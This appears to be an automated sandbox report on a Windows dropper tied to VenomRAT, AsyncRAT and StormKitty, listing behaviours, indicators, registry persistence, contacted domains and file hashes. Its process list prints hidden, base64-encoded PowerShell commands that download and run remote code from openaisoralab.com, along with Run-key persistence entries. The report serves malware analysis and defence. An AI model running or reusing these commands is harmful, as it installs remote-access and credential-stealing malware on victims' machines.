Analysis Overview
SHA256
fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c
Threat Level: Known bad
The file fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c was found to be: Known bad.
Malicious Activity Summary
Venomrat family
VenomRAT
AsyncRat
Asyncrat family
StormKitty
Stormkitty family
StormKitty payload
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-17 15:25
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-17 15:25
Reported
2024-11-17 15:28
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
149s
Command Line
Signatures
AsyncRat
Asyncrat family
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
VenomRAT
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Venomrat family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
| N/A | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Edgeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Edgeservices\" \"C:\\Users\\Public\\Downloads\\Edgeservices\\Edgeservices.exe\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Chromeservices = "cmd.exe /C start \"\" /D \"C:\\Users\\Public\\Downloads\\Chromeservices\" \"C:\\Users\\Public\\Downloads\\Chromeservices\\Chromeservices.exe\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1324 set thread context of 2480 | N/A | C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
| PID 380 set thread context of 1640 | N/A | C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe
"C:\Users\Admin\AppData\Local\Temp\fbbb5ea69c9b064e3a7017f784a37f54937826fe958b03d65458b4c7e492365c.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c sora.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwAuAHQAeAB0ACcAKQA=
C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
"C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\SYSTEM32\cmd.exe
cmd /c sorast.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -EncodedCommand SQBFAFgAIAAoAGkAcgBtACAAJwBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBhAGkAcwBvAHIAYQBsAGEAYgAuAGMAbwBtAC8AUwB0AG8AcgBhAGcAZQAvAFQAbwB3AHMAZQByAHYAaQBjAGUAcwBzAHQALgB0AHgAdAAnACkA
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2480 -ip 2480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 1316
C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe
"C:\Users\Public\Downloads\Chromeservices\Chromeservices.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | openaisoralab.com | udp |
| US | 172.67.205.71:443 | openaisoralab.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.205.67.172.in-addr.arpa | udp |
| US | 172.67.205.71:443 | openaisoralab.com | tcp |
| US | 8.8.8.8:53 | jobdigitalmarketing.xyz | udp |
| US | 8.8.8.8:53 | thicktoys.sbs | udp |
| US | 8.8.8.8:53 | fleez-inc.sbs | udp |
| US | 8.8.8.8:53 | pull-trucker.sbs | udp |
| US | 8.8.8.8:53 | 3xc1aimbl0w.sbs | udp |
| US | 8.8.8.8:53 | bored-light.sbs | udp |
| US | 8.8.8.8:53 | 300snails.sbs | udp |
| US | 8.8.8.8:53 | faintbl0w.sbs | udp |
| US | 8.8.8.8:53 | crib-endanger.sbs | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sora.bat
| MD5 | 345718527c30710326719967e3fd4d50 |
| SHA1 | 8f7be9c69a4e95155dd33c935f362155d91c05dc |
| SHA256 | ac4db954f2a68c4b12ba72dc4feb193c16b9bdc6a58d9550a9a5fb7383227bd5 |
| SHA512 | 21bf40922a5fb96239eff6107d394cac3862b2a9068b80949bfe158a420d1588685d005c0d70ed69b7614d393b3f846d1d61e13048e9650a5087367b6f7c54f6 |
memory/1088-5-0x00007FFEF0AB3000-0x00007FFEF0AB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vusuap0l.q1s.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1088-11-0x000001B9F4690000-0x000001B9F46B2000-memory.dmp
memory/1088-16-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp
memory/1088-17-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp
memory/1088-18-0x000001B9F6F60000-0x000001B9F7122000-memory.dmp
memory/1088-48-0x00007FFEF0AB3000-0x00007FFEF0AB5000-memory.dmp
memory/1088-49-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp
C:\Users\Public\Downloads\Edgeservices\Edgeservices.exe
| MD5 | 25ab75a586f4b22ebae81e74b20bfee9 |
| SHA1 | 97f52704adbbd42f1c6415f565241ba1521c450f |
| SHA256 | 14a4044215f341ba1ece3e49d475e309749b65c8959f2724d26209ed705a225a |
| SHA512 | cfa18fcccdeb95450f9ddb24dd620edca3faec765d339395884bcd2369783e37fd41ab3923a2d7439512670eb9389555dfc5a72adb725c818d2a5f4ea5154f7c |
C:\Users\Public\Downloads\Edgeservices\MSVCP140.dll
| MD5 | 29c6c243cfb1cec96b4a1008274f9600 |
| SHA1 | c54b10ef6305cc3814c68e6c8fd6daecbb27622a |
| SHA256 | 44a5af24f8d5f9c50a9e5a200a0486100afb6a0e86377e2e3e622a7bbb57cb04 |
| SHA512 | 39c34554ea7b6d433c2aecfdeff87959e625e943bf7a446ebca8e5878eaf24198c1b188359a0343fb78478f2bc8b986ca4d0e69d39bac6ff80cb901fe4f113ee |
C:\Users\Public\Downloads\Edgeservices\vcruntime140.dll
| MD5 | 02794a29811ba0a78e9687a0010c37ce |
| SHA1 | 97b5701d18bd5e25537851614099e2ffce25d6d8 |
| SHA256 | 1729421a22585823493d5a125cd43a470889b952a2422f48a7bc8193f5c23b0f |
| SHA512 | caf2a478e9c78c8e93dd2288ed98a9261fcf2b7e807df84f2e4d76f8130c2e503eb2470c947a678ac63e59d7d54f74e80e743d635428aa874ec2d06df68d0272 |
C:\Users\Public\Downloads\Edgeservices\Qt5Core.dll
| MD5 | d63a867c0a14584dfe04a9712c64bc0b |
| SHA1 | 3dc1c8e9ca93962a6d3400be3ac7d76d65f87a01 |
| SHA256 | 60dbf8cb76cbfc6a1b6df53ea3c087eecba1bf59737a1de2a2b96475f0c912c0 |
| SHA512 | aeebf3c911816b0b984bf78a43275575e7e1ddb61473d0bd14504316cf389da0373e78948c0ba3d54146aed95f2569987549b76a1325e0c949e2d16e038c8914 |
C:\Users\Public\Downloads\Edgeservices\vcruntime140_1.dll
| MD5 | d8d1a08176ba2542c58669c1c04da1b7 |
| SHA1 | e0d0059baf23fb5e1d2dadedc12e2f53c930256d |
| SHA256 | 26c29d01df73a8e35d32e430c892d925abb6e4ad62d3630ae42b69daacba1a0d |
| SHA512 | 5308790fbcf6348e87e7d5b9235ed66942527326f7ba556c910d68d94617bdd247a4ed540b4b9f8d4e73d15cf4a7204c0a57d4fd348ec26e53f39b91be8617fb |
C:\Users\Public\Downloads\Edgeservices\concrt140e.dll
| MD5 | 22c3fc378a3c3311bb5e9082c443fbd4 |
| SHA1 | 06c32b31de4772da425c1eebc6c8064ed4305843 |
| SHA256 | 422172e732ebd0892d8e737c07c3a9fead044f6f0d587a2e5991c40783e03ca9 |
| SHA512 | 4330eb482c2257a1775e1edc10753dc302042266fc012a20007c1706e31c65a67017d7eb63a1eb5e13a84b7638ddf24017c63b71e92dfd30215cc7ab7f878a4b |
memory/2480-69-0x0000000000400000-0x000000000064A000-memory.dmp
memory/1088-70-0x00007FFEF0AB0000-0x00007FFEF1571000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sorast.bat
| MD5 | d80437fda6ba90dd8338ca91fbcc18dc |
| SHA1 | 87415b5650b55ff7b2a38684768a49018e42d982 |
| SHA256 | 81d20d2731ab795995553d20cb60a7481ae4fa27615257418489f802683b435a |
| SHA512 | 2ffc42e30f0a63d1b9a563ee9ec346faf26a71d4f9f3a429f35e4d95d446a2dbc6aa2bb43a37d0b8533feb02bd738e5708be49919ad27cc572175d547be07240 |
memory/2480-72-0x00000000059B0000-0x0000000005F54000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 56c43715e0e7fa58012d8a5769d8d568 |
| SHA1 | 4370ca3436f2e3a95b47a728503a2c22a5a5fa39 |
| SHA256 | 8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5 |
| SHA512 | b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e9a929a0092fad42a2ddadab08c92cb6 |
| SHA1 | 4075acd066c1ee6535d2795c1cb2ff105b202760 |
| SHA256 | 796bb53fc5db0118d175df6f018ff87642b70c0ea7812e3286ae556d0c68821e |
| SHA512 | 6b4c1af8b28ede7617a6ae357c4590249a61979baf9e27b4564d2c4c44fd36a163a7c2840e214523b1b9638d10a1257e751c0f95d9520e9dd90a9bc4f91115a8 |
memory/2480-85-0x0000000005330000-0x0000000005396000-memory.dmp
C:\Users\Public\Downloads\Chromeservices\Qt5Core.dll
| MD5 | 0897cd584a6a8e39b9f2e25a2ab193e2 |
| SHA1 | 4af09f0291c659d74e4e7f1a7e96632b3987daef |
| SHA256 | 8c7cda207cb9031fb126719a43bff6e2fb4b8e2ccffb3efa2b895f6092603b65 |
| SHA512 | bfb5663756a8b18a0945e9e654256870f100de50e815dcddb86a2aed06bb85b2e5792e121b4af0560987adc40c5b9e020a5e32e1ddf4dafd29efc2aca9b9a427 |
C:\Users\Public\Downloads\Chromeservices\concrt140e.dll
| MD5 | 8b0e3a4d5c72ddee5866296bcb2c8185 |
| SHA1 | d689fbf9c6fcf957243e0c3f89831cecf69eade3 |
| SHA256 | 2d585161ec71beeaf8234163341482a06d6ee01856e058518986a59fbddeb11b |
| SHA512 | ca33dccc148b9acdeb1f064d6313101c8bc5daaed04f417b42a30d2bf4788e7d23b8536c0431650fbe5fcf4b44aeab3db478452390f4cb78ea42d731e8a5e198 |
memory/1640-132-0x0000000000400000-0x0000000000457000-memory.dmp
memory/1640-133-0x0000000000400000-0x0000000000457000-memory.dmp